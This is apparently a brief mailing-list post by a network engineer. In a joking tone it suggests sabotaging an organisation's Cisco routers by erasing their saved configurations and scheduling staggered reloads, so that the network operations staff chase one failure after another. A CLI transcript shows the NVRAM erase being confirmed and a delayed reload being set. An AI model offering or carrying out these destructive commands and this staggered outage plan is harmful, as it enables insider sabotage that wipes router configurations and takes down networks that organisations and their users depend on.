How about a "wr e" with a timed reload. If they are using a network
management app like HP Openview, have the routers reload from the outskirts
of the network first and work their way in. Maybe have a one or two minute
interval between each router reloading. This will keep the guys in the NOC
busy ;-) As soon as they start looking into one router going red on the
Openview map another ones goes belly up. ;-)

Gateway#wr e
Erasing the nvram filesystem will remove all files! Continue? [confirm]y[OK]
Erase of nvram: complete
Gateway#reload in 35790
Reload scheduled in 596 hours and 30 minutes
Proceed with reload? [confirm]y
Gateway#

Brian Dennis, CCIE #2210 (R&S)(ISP/Dial)